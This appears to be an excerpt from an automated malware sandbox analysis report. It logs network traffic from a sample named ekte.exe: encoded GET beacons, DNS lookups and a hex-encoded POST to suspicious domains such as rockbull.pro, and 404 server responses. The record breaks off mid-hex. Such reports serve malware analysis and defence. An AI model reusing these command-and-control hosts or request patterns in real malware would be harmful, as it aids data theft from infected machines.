            Source: global trafficHTTP traffic detected: GET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1Host: www.guldeu.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1Host: www.wdgb23.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1Host: www.childlesscatlady.todayAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
            Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: www.deikamalaharris.info
            Source: global trafficDNS traffic detected: DNS query: www.sqlite.org
            Source: global trafficDNS traffic detected: DNS query: www.rockbull.pro
            Source: global trafficDNS traffic detected: DNS query: www.timetime.store
            Source: global trafficDNS traffic detected: DNS query: www.guldeu.xyz
            Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
            Source: global trafficDNS traffic detected: DNS query: www.wdgb23.top
            Source: global trafficDNS traffic detected: DNS query: www.childlesscatlady.today
            Source: global trafficDNS traffic detected: DNS query: www.martaschrimpf.info
            Source: unknownHTTP traffic detected: POST /0804/ HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.rockbull.proContent-Length: 2165Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeReferer: http://www.rockbull.pro/0804/User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Data Raw: 6f 30 49 38 62 4a 57 68 3d 32 65 34 5a 43 77 64 78 65 44 36 41 65 47 61 41 69 6a 71 5a 54 49 5a 46 65 55 47 68 46 36 43 56 32 72 39 63 59 2b 72 65 6a 44 57 66 71 54 77 34 74 4a 47 76 48 35 38 2f 2f 47 7a 4f 6f 32 69 55 30 51 53 64 63 41 7a 54 67 47 5a 5a 7a 35 4d 48 71 68 4a 52 5a 71 62 74 65 75 44 4e 6a 5a 4b 6f 66 67 2f 4b 5a 36 59 48 66 32 58 35 51 6a 71 37 46 31 53 54 4b 77 65 51 68 4f 6c 37 50 6b 62 77 6c 46 76 51 51 68 72 41 49 4e 6a 30 63 70 6d 62 2f 77 59 61 78 49 6f 67 72 64 76 6a 6a 70 2b 56 6b 43 45 66 76 41 35 7a 70 6d 4a 36 4f 34 30 6b 33 76 58 4c 6d 6c 62 70 34 36 41 51 51 31 65 32 48 53 67 64 6d 61 69 44 38 71 76 73 75 58 41 2b 79 4b 47 4d 39 51 68 74 4d 63 33 33 54 55 55 53 2f 63 69 32 75 46 78 61 7a 57 62 7a 59 5a 72 47 61 4f 57 51 69 37 6e 77 61 75 42 65 48 46 4d 6f 4c 4b 68 6e 69 65 4d 56 6b 44 61 36 47 41 35 74 69 4d 51 5a 68 53 2b 62 57 66 7a 48 54 4e 55 5a 38 62 76 58 63 75 74 66 6f 4e 54 64 65 49 6f 50 6f 64 69 4d 77 71 41 4f 37 70 70 4e 6d 4b 59 79 32 31 46 64 79 32 79 59 6d 7a 36 62 36 46 74 56 56 39 30 57 32 66 79 54 70 64 31 46 35 31 78 44 43 34 6f 77 47 55 4a 64 36 38 76 35 6e 63 76 53 42 72 2b 66 6e 49 4b 6a 63 66 6c 64 72 51 56 6a 6a 6d 56 75 34 51 6d 66 2b 64 58 45 4d 4b 49 4b 51 57 38 74 64 33 6b 6c 49 43 64 56 55 33 67 55 31 70 78 55 6f 38 32 46 4a 6b 73 6a 61 77 45 62 6e 63 44 71 2b 69 73 57 69 2f 35 44 64 43 53 52 71 76 47 69 4b 73 4c 4c 4f 49 53 74 38 42 49 63 59 6e 75 69 69 65 79 77 64 6b 75 4d 30 55 35 2f 57 79 33 66 45 4d 7a 57 74 7a 75 34 7a 79 65 64 4e 38 65 42 52 55 2f 55 44 34 72 48 36 74 66 72 38 56 30 51 2f 76 4e 6b 39 37 32 59 6d 32 37 51 48 4c 65 4b 72 68 5a 68 72 44 69 71 56 52 45 73 45 6e 47 46 66 47 56 6a 47 75 47 4f 6c 6d 34 4e 77 75 76 51 56 63 63 4b 5a 71 70 4c 43 42 49 2b 47 32 6e 79 32 65 52 39 46 6c 39 47 66 61 35 77 70 61 76 4a 61 2f 67 56 31 57 7a 39 4c 71 4e 78 74 51 6d 65 32 79 5a 79 64 6d 46 4c 42 54 46 32 59 74 41 69 54 49 62 46 35 79 57 42 41 4c 46 41 75 78 7a 53 54 4a 79 38 73 6d 43 4c 36 36 6f 55 33 63 6d 6b 61 4e 45 38 58 67 6f 62 36 77 71 61 34 6c 6f 36 45 34 56 46 37 6b 45 2f 37 39 76 73 76 4f 68 79 66 6d 57 34 37 71 4d 4c 68 2b 52 38 4e 77 73 6c 6e 62 6c 53 55 31 50 53 38 49 4a 44 53 67 47 63 65 4a 77 33 57 79 69 69 78 6c 69 4b 39 31 76 70 75 72 59 42 51 55 54 79 68 72 65 55 76 74 74 64 6d 68 42 59 6a 66 34 51 79 56 6b 6a 70 54 79 4f 71 4e 33 59 62 52 6d 54 4e 47 78 39 56 50 57 6a 75 6d 2f 30 55 49 6c 37 34 72 4e 35 44 73 33 50 44 76 43 70 4f 54 42 70 68 45
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 21 Oct 2024 11:15:25 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 31 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 34 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:36 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:39 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:41 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:15:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:00 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Oct 2024 11:16:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 